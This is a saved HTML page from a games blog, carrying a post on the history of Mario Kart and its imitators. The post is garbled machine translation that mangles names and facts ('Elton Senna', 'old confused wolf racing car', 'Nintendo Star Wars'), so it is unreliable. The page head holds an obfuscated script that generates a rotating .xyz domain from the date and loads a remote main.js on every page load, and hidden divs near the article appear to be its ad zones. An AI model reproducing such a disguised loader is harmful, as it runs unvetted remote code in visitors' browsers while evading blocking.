<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="Throughout the whole field of video games, racing games have never stopped moving forward. Today, the market is full of all kinds of game works with different styles, no matter whether they are leisur">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="From derivative to serialization, who can shake the title of Mario Kart">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="Throughout the whole field of video games, racing games have never stopped moving forward. Today, the market is full of all kinds of game works with different styles, no matter whether they are leisur">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/7440182ea2d64363962e6697905313e6.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/b589d5e8adc149fc8546c19b6721b5b9.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/6c74b4eb4adb4c06b5c3ce75a6148a6d.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/742b5dd8acd34bcab358b23450ea6ae7.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/c9a9497400984be79fee559e9f067548.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/351d881bd60045a09da9971a080c4fef.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/580a7ee487a142988e048e0022f816b1.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/ff95ef2df4be46cf9a3fa7387a8f1b9e.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:49.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="From derivative to serialization, who can shake the title of Mario Kart">
<meta name="twitter:description" content="Throughout the whole field of video games, racing games have never stopped moving forward. Today, the market is full of all kinds of game works with different styles, no matter whether they are leisur">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/7440182ea2d64363962e6697905313e6.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>From derivative to serialization, who can shake the title of Mario Kart | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">From derivative to serialization, who can shake the title of Mario Kart</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>Throughout the whole field of video games, racing games have never stopped moving forward. Today, the market is full of all kinds of game works with different styles, no matter whether they are leisure or virtual, realistic or pompous. Because of its simple and intuitive playing method, racing games can lead the era in terms of picture quality, and the theme can also be accepted by any majority of people. What is puzzling is that compared with other types of games, racing games have never been too large a group of players.<br><img src="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/7440182ea2d64363962e6697905313e6.jpg" alt="From derivative to serialization, who can shake the title of Mario Kart"><br>However, there is only such a racing game, which is suitable for all ages, no matter from the playing method or the style, and it still keeps its vitality up to now. He is one of Nintendo’s leading IP, even if it is put in the whole field of racing games, it is also the largest and most popular audience. Since the SFC era, it has never lost every Nintendo game console. It is derived from the Super Mario Brothers series, and now it can be called the existence of “masterpiece”: Mario Kart.</p>
<h1 id="“he’s-really-a-go-kart”"><a href="#“he’s-really-a-go-kart”" class="headerlink" title="“he’s really a go kart”"></a>“he’s really a go kart”</h1><p>But anyone who has a certain understanding of the racing culture should know that in reality, the types of racing are very complex, and the simplest sport in all kinds is kart. The so-called karting is a micro sports car, which originated in the 1950s. Compared with F1 or other racing sports, karting can only be described as “simple” in terms of vehicle structure and driving difficulty. The speed and horsepower of the kart are not very big. The leisure kart can run 80 km / h at most, while the racing ability can only run 130 km / h, so it is much safer than other racing sports. However, due to its very low chassis, the driver can feel the relative speed 2 or 3 times faster than the speed. The easy to use, safe and equally stimulating driving experience has made this sport popular with many people who love racing but are afraid of accidents. In history, many F1 car champions are kart drivers, such as legendary car gods Michael Schumacher and Elton Senna.<br><img src="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/b589d5e8adc149fc8546c19b6721b5b9.jpg" alt="From derivative to serialization, who can shake the title of Mario Kart"><br>The go kart that Sena used to drive has been auctioned for 57500 euros (about 412000 yuan)<br>In 1990, Nintendo launched a science fiction racing game called “f-zero” as one of the first games of the new host SFC, which aims to show the hardware performance of SFC far beyond FC. The sense of speed and thrill of f-zero is rarely matched by racing games today. Due to the science fiction theme, the speed of vehicles in the game can soar to a super high speed of 400km / h. Although they can fully experience the high-speed processing function of SFC, they suffer the players who play. Super high speed means that there is a high demand for the players’ reaction ability, which makes the starting threshold of the game quite high. Many players can’t even run the whole course. In the middle of the road, because of frequent collisions, the vehicles are exploded. Compared with other racing games, the play method of f-zero is too novel, so it can’t be accepted by most players, but the quality of the game itself is still high It’s very hard.<br><img src="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/6c74b4eb4adb4c06b5c3ce75a6148a6d.jpg" alt="From derivative to serialization, who can shake the title of Mario Kart"><br>SFC version f-zero<br>Opportunity for<br>After that, Nintendo’s ace producer Miyamoto attempted to make an SFC game that could support split screen play. In order to enable the players in front of the TV to interact with each other, he still planned to make a racing game. However, in view of the split screen function to split the function of the host, he could not adopt the super high-speed design like f-zero, and in view of the kart at that time The sport was also very popular in Japan, so Miyamoto decided to use karts as the theme. But just driving doesn’t achieve the “interaction between players” effect that Miyamoto imagined. At this time, Miyamoto thought of his own series of Mario.<br><img src="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/742b5dd8acd34bcab358b23450ea6ae7.jpg" alt="From derivative to serialization, who can shake the title of Mario Kart"><br>This picture comes with BGM<br>As early as 1985, Nintendo launched the horizontal action game “Super Mario Brothers” on the FC game platform, which shocked the world for a while, caused the simple and clear play method and interesting design, made the game market which was dead because of “yadali collapse” rejuvenated, and made indelible contribution to the reconstruction of the electronic entertainment market The series of works of “Mario” has also established the name of “Mario” all over the world. Since it’s not interesting, why not add the elements of Mario to the go kart? In this way, the game itself will be very interesting, and his goal will be achieved, and with the reputation of Mario, you don’t have to worry about the publicity of the game, which can be described as killing three birds with one stone. In 1992, Super Mario Kart, a derivative of Super Mario series, came into being.<br><img src="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/c9a9497400984be79fee559e9f067548.jpg" alt="From derivative to serialization, who can shake the title of Mario Kart"><br>Super Mario Kart in split screen mode<br>Imitator<br>The highlight of “Super Mario Kart” is that the core of the game is not just to win by speed, but to “pit” each other with other drivers by using various props. People running behind can also have a high probability of rushing to the first place, and the first driver may become the target of tens of thousands of people. At the same time, the operation of the game is very simple, very easy to use, but at the same time, it does not lose the depth, even hard core players can find fun in it. This interesting racing game has been highly praised by the media all over the world as soon as it comes into the market. The supply of the game’s card belt exceeds the demand. The sales volume of 8.76 million sets also makes it the existence of the SFC platform “shoulder handle”. The success of the game also made Miyamoto realize the potential and value of this work, so he decided to take it out as an independent work and make it on the scale of other Nintendo first party games.<br><img src="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/351d881bd60045a09da9971a080c4fef.jpg" alt="From derivative to serialization, who can shake the title of Mario Kart"><br>Over the next decade, Mario Kart appeared on every Nintendo game console, both on the console and the handheld. Today, there are eight orthodox works (excluding special edition) in Mario Kart, and even many arcade versions. Each generation is constantly adding new content and new systems, and the map in the game is rarely repeated, but the only constant is the operation method that has never changed for many years, and the playing method is always the same, but each generation has different game bodies Proven. With the new system filling in, the vehicles driven by each character in the game are no longer limited to karts, so later versions of players are more accustomed to be called “Mario racing car”.<br><img src="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/580a7ee487a142988e048e0022f816b1.jpg" alt="From derivative to serialization, who can shake the title of Mario Kart"><br>Like “big fight,” many of Nintendo’s other game characters have joined the game<br>There is such a common sense in the game industry: if a game can become a blockbuster, it will inevitably lead to a wave of follow-up among manufacturers. “Mario racing car” naturally triggered other manufacturers to follow suit. Sony, the next door friend, also launched its own host PS, and produced the “old confused wolf racing car” with the theme of “old confused wolf” series. Square, the Japanese manufacturer behind Sony, also launched the “land bird racing car” derived from its “Final Fantasy” series. Today, Sega has also spent many years to create a slightly mature “sonic racing” series, while the naughty dog’s “old perplexed wolf racing” is still being launched, although it can be seen that there are no less than the same elements of the “Mario racing” series, but also made its own unique features.<br><img src="http://maiygu.xyz/2019/11/08/From derivative to serialization, who can shake the title of Mario Kart/ff95ef2df4be46cf9a3fa7387a8f1b9e.jpg" alt="From derivative to serialization, who can shake the title of Mario Kart"><br>Just released a few days ago, “the old perplexed wolf racing car: remake the plate” has also won a lot of praise from the media<br>    concluding remarks<br>No matter how the works of other manufacturers change, it is difficult to shake the dominance of Mario racing, because compared with other works, it really does it with great care. Especially in the European and American players, the Mario racing series is second only to the Nintendo Star Wars, while the proportion of Japanese and Chinese players is not too much, but not too little. After all, for European and American players, a game to be interesting is the main premise, which is why the popularity of Fortress night in Europe and the United States far exceeds that of Jedi survival. But there is no doubt that the influence of Mario racing series is really big enough, and now it can compete with his original works, and it is still growing.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/From disdain to participation, Nintendo has also been labeled as a mobile giant/" rel="next" title="From disdain to participation, Nintendo has also been labeled as a mobile giant">
                <i class="fa fa-chevron-left"></i> From disdain to participation, Nintendo has also been labeled as a mobile giant
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/From 2D boy to tomorrow company, the story behind the puzzle game stick to the world/" rel="prev" title="From 2D boy to tomorrow company, the story behind the puzzle game stick to the world">
                From 2D boy to tomorrow company, the story behind the puzzle game stick to the world <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#“he’s-really-a-go-kart”"><span class="nav-number">1.</span> <span class="nav-text">“he’s really a go kart”</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
